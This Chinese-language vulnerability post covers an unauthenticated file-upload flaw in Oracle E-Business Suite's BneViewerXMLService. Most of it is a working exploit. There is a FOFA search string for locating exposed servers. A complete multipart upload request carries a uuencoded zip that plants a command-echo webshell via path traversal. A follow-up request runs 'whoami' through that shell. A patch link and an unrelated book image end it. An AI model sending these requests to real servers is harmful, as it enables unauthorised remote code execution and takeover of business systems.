0x01 产品简介
Oracle E-Business Suite(电子商务套件)是美国甲骨文(Oracle)公司的一套全面集成式的全球业务管理软件。该软件提供了客户关系管理、服务管理、财务管理等功能。
0x02 漏洞概述
Oracle E-Business Suite 的 Oracle Web Applications Desktop Integrator 接口BneViewerXMLService处存在任意文件上传漏洞,未经身份验证的攻击者通过上传恶意的webshell文件,获取服务器权限。
0x03 影响范围
Oracle Web Applications Desktop Integrator 12.2.3-12.2.11版本
0x04 复现环境
FOFA:app="Oracle-E-Business-Suite"
0x05 漏洞复现
Exp
POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv------WebKitFormBoundaryZsMro0UsAQYLDZGv
Content-Disposition: form-data; name="bne:uueupload"TRUE
------WebKitFormBoundaryZsMro0UsAQYLDZGv
Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"begin 664 test.zip
M4$L#!!0``````)QQ/%8&2`KJ<0```'$```!#````+BXO+BXO+BXO+BXO+BXO
M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
M1%=24BYP;'5S92!#1TD["G!R:6YT($-'23HZ:&5A9&5R*"`M='EP92`]/B`G
M=&5X="]P;&%I;B<@*3L*;7D@)&-M9"`]($-'23HZ:'1T<"@G2%144%]#340G
M*3L*<')I;G0@<WES=&5M*"1C;60I.PIE>&ET(#`[4$L!`A0#%```````G'$\
M5@9("NIQ````<0```$,``````````````*2!`````"XN+RXN+RXN+RXN+RXN
M+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R:7!T<R]T>&M&
>3D174E(N<&Q02P4&``````$``0!Q````T@``````
`
end
------WebKitFormBoundaryZsMro0UsAQYLDZGv--上传带命令回显的马子
RCE
GET /OA_CGI/FNDWRR.exe HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: whoami
Accept-Encoding: gzip
0x06 修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://www.oracle.com/security-alerts/cpuoct2022.html
![[黑皮系列] 计算机网络:自顶向下方法(第8版)](https://img-blog.csdnimg.cn/direct/459fe81a9f264dfd9483a468e5702892.jpeg#pic_center)
